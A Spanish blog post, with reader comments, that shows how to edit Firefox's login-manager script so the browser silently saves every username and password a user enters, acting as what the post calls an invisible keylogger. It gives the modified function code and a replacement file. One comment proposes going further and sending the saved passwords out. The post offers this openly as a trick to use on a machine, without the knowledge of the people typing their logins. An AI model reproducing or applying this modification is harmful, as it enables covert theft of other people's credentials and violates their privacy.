Convierte tu Firefox en un keylogger invisible

Acabo de leer un curioso truquillo muy fácil de implementar para que Firefox almacene los usuarios y contraseñas de forma automática, sin mostrar un prompt al usuario. De esta manera, nuestro navegador será como un keylogger virtual que capturará los logins y podremos ver las contraseñas introducidas a través del menú Herramientas / Opciones... / Pestaña Seguridad / Contraseñas guardadas...

Sólo tendremos que modificar el script "nsLoginManagerPrompter.js" en "
C:/Archivos de programa/Mozilla Firefox/Components" quitando de la función _showSaveLoginNotification los elementos que muestran al usuario la notificación (típica barra con los botones "Remember", "Never for this site", "Not now") y forzar el almacenamiento del login llamando a la función del botón "Remember": pwmgr.addLogin(aLogin);.

El fragmento de código quedaría así:


_showSaveLoginNotification : function (aNotifyBox, aLogin) {

var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);},

O si lo prefieres, sustituye simplemente el js por éste.

8 comentarios :

  1. Lo probé hace un tiempo, pensaba que a estas alturas no funcionaría... :S

    ResponderEliminar
  2. el archivo que mencionas no aparece en la version 4, lo que comentas es para la version 3 verdad?

    ResponderEliminar
  3. @Anónimo, echa un ojo a los comentarios en http://superuser.com/questions/73444/firefox-remember-new-passwords-without-prompting

    ResponderEliminar
  4. Lo ideal ahora sería conseguir que todas las contraseñas guardadas fuesen enviadas y sería la jugada casi perfecta.

    ResponderEliminar
  5. Hola, muy interesante el "truquillo" pero al intentar llevarlo a cabo en mi ordenador me sale el siguiente mensaje
    Error: Error de sintaxis
    Código: 800A03EA
    Origen: Error de compilación de Microsoft JScript

    No soy muy buena con los ordenadores y no entiendo cuál es el error, podrías ayudarme a resolverlo?

    Gracias

    ResponderEliminar
  6. holA, buenas noches... no logro encontrar el archivo
    nsLoginManagerPrompter.js
    tengo la version 17.0.1

    ResponderEliminar
  7. A partir de Firefox 4 los archivos están comprimidos en omni.ja.

    Echa un vistazo a: http://hackersamhood.blogspot.com.es/2012/03/use-firefox-as-key-logger-its-very.html

    ResponderEliminar
  8. Está eliminado el blog hackersamhood alguien tiene otra referencia?

    ResponderEliminar